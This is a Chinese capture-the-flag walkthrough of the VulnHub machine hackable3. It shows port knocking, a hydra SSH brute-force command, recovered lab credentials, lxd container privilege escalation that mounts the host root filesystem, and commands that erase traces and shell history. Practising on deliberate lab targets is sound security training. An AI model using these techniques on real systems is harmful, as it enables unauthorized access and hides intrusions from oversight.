vulnhub靶场之hackableⅢ

devtools/2024/11/30 20:41:11/

hackable3

前言

这里使用virtual box加载靶机

靶机:hackable3

攻击:kali

主机发现

使用arp-scan -l扫描

在这里插入图片描述

信息收集

使用nmap扫描

在这里插入图片描述

这里明显:

  1. 22端口ssh服务可能过滤了
  2. 80端口开启apachehttp服务

网站目录扫描

使用dirsearch扫描,或者gobusterffufdirbdirbuster

在这里插入图片描述

进一步信息收集

测试22端口是否可用,可能设置条件了

在这里插入图片描述

直接访问页面,并查看源代码

在这里插入图片描述

根据上面的目录扫描,访问HTTP服务

访问/robots.txt 文件,这个目录算是信息泄露

在这里插入图片描述

访问/config,有一个1.txt文件,打开后是经过编码处理的数据,尝试解码

在这里插入图片描述

base64解码后,是一串数字10000,不过这也不确定是否是base64编码

继续访问其他目录/backup

访问发现有一个txt文件,访问发现算是字典

在这里插入图片描述

登录界面的源码/login.php

在这里插入图片描述

首先是POST接收,那么就需要使用burp进行测试

分析

  1. 首先接收user赋值给usuario,接收pass赋值给senha
  2. 从数据库中查询表usuarios,对用户的输入进行判断。正确会返回数据库的值
  3. 当数据库有返回的时候,会把用户名赋值给session

这里还有一张图片,并且没有路径,可能在当前目录下,直接访问,使用wget下载到本地

然后使用steghide检测是否有隐藏信息,这里如果有passphrase的话,是需要输入的,这里并不知道,直接回车

在这里插入图片描述

访问login_page/login.html

在这里插入图片描述

访问/config.php文件,这里提示,默认设置root无密码,对于mysql服务

在这里插入图片描述

访问css目录,访问发现2.txt,打开也是一段编码的字符

在这里插入图片描述

尝试进行解码,之前碰到过,其实就是brain

在这里插入图片描述

信息总结

  1. 可能有用户jubiscleudo
  2. 获取两个端口,65535、100004444
  3. 数据库是mysql数据库
  4. 连接数据库的用户root没设置密码
  5. login.php可以返回表的所有数据
  6. 有一个字典

漏洞寻找

在 Linux 系统中有一个名为 “knock” 的命令行工具,它用于实现端口敲门功能。通过这个工具,用户可以在命令行下轻松地发送端口敲门序列。例如,如果要按照前面提到的端口序列(1000、2000、3000)进行敲门,在安装并配置好 “knock” 工具后,可以使用类似 “knock < 服务器 IP 地址 > 1000 2000 3000” 的命令来触发服务器上对应的安全策略。

根据上面来说,是进行了安全策略,需要按照之前获取的1.txt、2.txt、3.txt所解出的端口进行顺序

简单来说,就是像一种暗号一样,对了才能访问SSH服务

在这里插入图片描述

现在可以正常访问ssh服务,然后根据前面获取的,可能存在用户jubiscleudo,也给出一个字典,尝试对其进行爆破

hydra -l jubiscleudo -P wordlist.txt ssh://192.168.1.38 -vV -f
//该字典使用的是网站给出的

在这里插入图片描述

漏洞利用

获取成功,密码为onlymy,登录,然后发现还有一个用户。

在这里插入图片描述

使用find寻找具有SUID权限

在这里插入图片描述

尝试使用sudo进行查看

在这里插入图片描述

这样提权不行,搜索一些敏感文件的关键字,如*user*、*pass*、*back*等等

在这里插入图片描述

发现之前没有看到的php文件,去查看,可以看到在进行与mysql服务连接时,设置的用户名和密码

在这里插入图片描述

用户名hackable_3,密码TrOLLED_3,不过这里的密码是作为数据库连接的,不知道是否是其本身密码

测试发现可以,就是其密码,这里需要注意,id命令时的lxd

在这里插入图片描述

尝试sudo提权,发现不行

在这里插入图片描述

lxd提权

环境配置

https://github.com/saghul/lxd-alpine-builder.git从这里下载项目

在这里插入图片描述

root身份进行搭建

在这里插入图片描述

然后在该目录下开启一个简易的http服务,然后在靶机中下载

在这里插入图片描述

使用lxc导入该包到镜像中,并起别名为test

lxc image import ./alpine-v3.13-x86_64-20210218_0139.tar.gz --alias test

然后使用lxc image list列出镜像

在这里插入图片描述

进行lxd初始化,一直回车即可

在这里插入图片描述

提权使用

生成一个初始化容器

lxc init test dijia -c security.privileged=true
//这里的test就是前面初始化的镜像别名

在这里插入图片描述

在这里插入图片描述

把磁盘挂载

lxc config device add dijia mydevice disk source=/ path=/mnt/root recursive=true

启动创建的dijia容器

lxc start dijia

在这里插入图片描述

容器执行/bin/sh

lxc exec dijia /bin/sh

在这里插入图片描述
在这里插入图片描述

清除痕迹

在这里插入图片描述

lxc stop dijia		//暂停容器dijia
lxc delete dijia	//删除容器dijia
lxc image delete test	//删除镜像test
rm -rf alpine-v3.13-x86_64-20210218_0139.tar.gz snap	//删除下载的文件

history -c

history -r

总结

  1. 对于信息的收集,只要有可能,都记录下来
  2. 编码加密的一些使用,要会解码解密
  3. 对于网站的目录,最好的方式就是都看一看页面源代码
  4. 这里的ssh服务开启某种安全策略,所以需要特定的序号端口进行访问才能打开22端口
  5. 密码爆破,hydra的使用
  6. lxd、lxc的使用,容器,感觉用法其实和现在的docker很相似。

http://www.ppmy.cn/devtools/138285.html

相关文章

中国前首富胡志标亮相创客匠人盛会,点燃创始人 IP 新思维火花

创客匠人正式官宣&#xff01;原爱多VCD创始人、中国前首富胡志标受邀出席创客匠人5000人“全球创始人IP领袖高峰论坛”&#xff0c;将与我们携手共赴这场商业巅峰盛宴。 由创客匠人打造的“全球创始人IP领袖高峰论坛”将在2024年12月26日-28日在厦门市国际博览会议中心如期举…

wangEditor富文本插入自定义应用

文章目录 前言Modal插入富文本应用注册新菜单在自定义Modal操作Editor实例 前言 最近在业务中被要求用到了富文本的需求&#xff0c;经过调研最终决定使用国产的 wangeditor &#xff0c;需要在富文本菜单里插入自己的外部应用&#xff0c;本文旨在记录。 Modal插入富文本应用…

深度学习模型:门控循环单元(GRU)详解

本文深入探讨了门控循环单元&#xff08;GRU&#xff09;&#xff0c;它是一种简化版的长短期记忆网络&#xff08;LSTM&#xff09;&#xff0c;在处理序列数据方面表现出色。文章详细介绍了 GRU 的基本原理、与 LSTM 的对比、在不同领域的应用以及相关的代码实现&#xff0c;…

qt QStyle详解

1、概述 QStyle是Qt框架中用于自定义和绘制控件样式的一个核心类。它提供了一套丰富的API&#xff0c;允许开发者根据应用程序的需求和平台的视觉风格&#xff0c;自定义控件的外观和行为。QStyle的主要职责是处理控件的绘制&#xff08;painting&#xff09;和布局&#xff0…

图论入门编程

卡码网刷题链接&#xff1a;98. 所有可达路径 一、题目简述 二、编程demo 方法①邻接矩阵 from collections import defaultdict #简历邻接矩阵 def build_graph(): n, m map(int,input().split()) graph [[0 for _ in range(n1)] for _ in range(n1)]for _ in range(m): …

软件工程——期末复习(适用于sdut)

名词解释&#xff1a; 名词解释--人月 答案&#xff1a;人月是软件开发工作量的单位&#xff0c;1人月表示1个程序员1个月的工作时间所开发的代码量。 请解释软件缺陷、错误和失败&#xff0c;并简单举例说明。 答案&#xff1a;缺陷&#xff08;defect&#xff09;指系统代…

【设计模式】【行为型模式(Behavioral Patterns)】之策略模式(Strategy Pattern)

1. 设计模式原理说明 策略模式&#xff08;Strategy Pattern&#xff09; 是一种行为设计模式&#xff0c;它允许你定义一系列算法&#xff0c;并将每个算法封装起来&#xff0c;使它们可以互换。策略模式让算法的变化独立于使用算法的客户。通过这种方式&#xff0c;客户端可…

服务器如何隐藏端口才能不被扫描?

在服务器上隐藏端口以避免被扫描&#xff0c;是一种增强安全性的措施。虽然完全隐藏端口不太可能&#xff08;因为网络通信本质上需要暴露端口&#xff09;&#xff0c;但可以通过一系列技术手段尽量降低端口被扫描或探测的可能性。以下是详细的实现方法&#xff1a; 1. 更改默…